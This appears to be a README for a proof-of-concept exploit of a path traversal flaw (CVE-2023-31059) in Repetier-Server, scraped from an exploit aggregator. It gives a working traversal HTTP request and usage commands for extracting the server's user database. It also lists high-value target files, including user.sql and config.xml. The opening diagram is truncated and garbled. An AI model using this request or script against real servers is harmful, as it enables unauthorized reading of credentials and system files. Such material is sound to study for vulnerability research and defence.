## https://sploitus.com/exploit?id=CB3B88DB-192B-5B74-A3BE-25A582D5AE2D
# Repetier-Server |HTTP request with ..%5c traversal| B[Repetier Server]
B --> C[base/connectionLost.php]
C -->|Unsanitized file parameter| D[Windows Filesystem]
D --> E[Sensitive File]
E --> B
B -->|File contents in HTTP response| A
````
---
## Exploitation Example
```
GET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344
```
---
## Usage
```bash
# Test vulnerability
python3 CVE-2023-31059.py http://:3344/ --test
# Extract user database
python3 CVE-2023-31059.py http://:3344/ \
--file "ProgramData\\Repetier-Server\\database\\user.sql" \
--depth 20
```
---
## Requirements
```bash
pip install requests
```
---
## High-Value Targets
```
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts
```
---
## Disclaimer
This PoC is provided for educational and authorized security testing purposes only.
Use only on systems you own or have explicit permission to test.
---
## Contact
GitHub: [https://github.com/mbanyamer](https://github.com/mbanyamer)